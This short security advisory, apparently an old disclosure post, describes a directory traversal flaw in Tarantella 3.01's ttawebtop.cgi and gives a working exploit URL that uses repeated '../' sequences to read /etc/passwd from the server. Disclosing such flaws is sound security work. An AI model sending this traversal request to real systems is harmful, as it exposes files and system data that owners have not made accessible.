Name        :  tarantella 3.01 ttawebtop.cgi "show files" vulnerability

Problem     :  '..' and '/' are not filtered while processing
               user input, so it is possible to enter arbitrary values
               to retreive files from remote sever, which should not be
               accessible normally.

Exploit:
      http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=
      ../../../../../../../../../../../../../../../etc/passwd

Author      :   KF (dotslash@snosoft.com)